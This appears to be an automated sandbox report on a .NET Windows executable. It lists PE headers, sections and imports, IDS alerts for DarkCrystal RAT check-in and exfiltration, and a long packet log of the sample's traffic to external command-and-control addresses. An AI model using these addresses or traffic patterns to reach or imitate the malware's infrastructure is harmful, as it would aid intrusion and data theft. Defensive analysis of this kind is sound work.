                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x8FECC87F [Sun Jul 8 10:48:31 2046 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x630d00x4b.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x590.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x660000xc.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x20000x611240x61200ca3d5f88fb5edc56ca7216682de8f8b3False0.4600526866151866data5.956544366964587IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0x640000x5900x60082c39eea34ce07077166e5c598e90129False0.4166666666666667data4.025634807679199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x660000xc0x200c3149318ea17c45d745f87ab0c391d0aFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_VERSION0x640a00x304data0.4339378238341969
                                                                                          RT_MANIFEST0x643a40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                          Imports

                                                                                          DLLImport
                                                                                          mscoree.dll_CorExeMain

                                                                                          Network Behavior

                                                                                          Suricata IDS Alerts

                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2024-12-10T07:28:13.983208+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.849713147.45.47.15180TCP
                                                                                          2024-12-10T07:28:31.389464+01002048130ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST)1192.168.2.849728147.45.47.15180TCP

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 10, 2024 07:27:43.800764084 CET4970480192.168.2.8208.95.112.1
                                                                                          Dec 10, 2024 07:27:43.920160055 CET8049704208.95.112.1192.168.2.8
                                                                                          Dec 10, 2024 07:27:43.920289993 CET4970480192.168.2.8208.95.112.1
                                                                                          Dec 10, 2024 07:27:43.938498974 CET4970480192.168.2.8208.95.112.1
                                                                                          Dec 10, 2024 07:27:44.058258057 CET8049704208.95.112.1192.168.2.8
                                                                                          Dec 10, 2024 07:27:45.080363035 CET8049704208.95.112.1192.168.2.8
                                                                                          Dec 10, 2024 07:27:45.132195950 CET4970480192.168.2.8208.95.112.1
                                                                                          Dec 10, 2024 07:27:46.417110920 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:46.629877090 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:46.629965067 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:46.630682945 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:46.631500006 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:46.640616894 CET4970480192.168.2.8208.95.112.1
                                                                                          Dec 10, 2024 07:27:46.750122070 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:46.750185966 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:46.751216888 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:46.751270056 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:46.751275063 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:46.751302958 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:46.751322031 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:46.751348019 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:46.751370907 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:46.751379967 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:46.751385927 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:46.751439095 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:46.751470089 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:46.751475096 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:46.751530886 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:46.751678944 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:46.751739979 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:46.760224104 CET8049704208.95.112.1192.168.2.8
                                                                                          Dec 10, 2024 07:27:46.760301113 CET4970480192.168.2.8208.95.112.1
                                                                                          Dec 10, 2024 07:27:46.869451046 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:46.869515896 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:46.870605946 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:46.870676041 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:46.870704889 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:46.870711088 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:46.870764017 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:46.870793104 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:46.870800972 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:46.870862961 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:46.917243958 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:46.917382002 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.036711931 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.036905050 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.077199936 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.197124004 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.197230101 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.397208929 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.397330999 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.609844923 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.610126019 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.610203028 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.729546070 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.729562044 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.729589939 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.729656935 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.729681015 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.729692936 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.729697943 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.729753017 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.729811907 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.729850054 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.729859114 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.729898930 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.729967117 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.730006933 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.730019093 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.730047941 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.730093956 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.730120897 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.730153084 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.730169058 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.730201960 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.730251074 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.730263948 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.730319977 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.730441093 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.730458021 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.730490923 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.730515957 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.730597973 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.730627060 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.730659008 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.730684996 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.730731010 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.730741978 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.730814934 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.730844021 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.730899096 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.730905056 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.730957031 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.730974913 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.731019974 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.731028080 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.731085062 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.731086016 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.731117010 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.731132984 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.731163025 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.731220007 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.731262922 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.731266975 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.731318951 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.731323004 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.731379986 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.731390953 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.731430054 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.731519938 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.731569052 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.731678009 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.731729984 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.848972082 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.849046946 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.849062920 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.849118948 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.849139929 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.849167109 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.849246025 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.849306107 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.849380970 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.849432945 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.849518061 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.849567890 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.849643946 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.849704981 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.849744081 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.849803925 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.849888086 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.849940062 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.850028992 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850081921 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.850156069 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850207090 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.850258112 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850313902 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.850394964 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850456953 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.850501060 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850572109 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.850647926 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850694895 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.850703955 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850760937 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.850788116 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850866079 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.850903034 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850913048 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850925922 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850965023 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.850975990 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850986958 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851047993 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851057053 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851067066 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851109028 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851144075 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851155043 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851210117 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851294041 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851304054 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851320982 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851330042 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851346016 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851370096 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851380110 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851392031 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851435900 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851458073 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851468086 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851497889 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851505995 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851528883 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851540089 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851563931 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851577044 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851620913 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851632118 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851670980 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851696968 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851710081 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851744890 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851761103 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851788998 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851798058 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851810932 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851871967 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851897001 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851908922 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851914883 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851985931 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852046013 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852056026 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852063894 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852082968 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852093935 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852127075 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852133989 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852154970 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852179050 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852190018 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852206945 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852247000 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852327108 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852338076 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852370024 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852381945 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852390051 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852440119 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852463961 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852509975 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852520943 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852555990 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852569103 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852576971 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852623940 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852648973 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852672100 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852680922 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852710009 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852740049 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.968420982 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.968451023 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.968489885 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.968523979 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.968586922 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.968628883 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.968647957 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.968683004 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.968704939 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.968729973 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.968751907 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.968785048 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.968801022 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.968810081 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.968863964 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.968873978 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.968908072 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.968925953 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.968964100 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.968981981 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.969017982 CET497055555192.168.2.8147.45.44.151
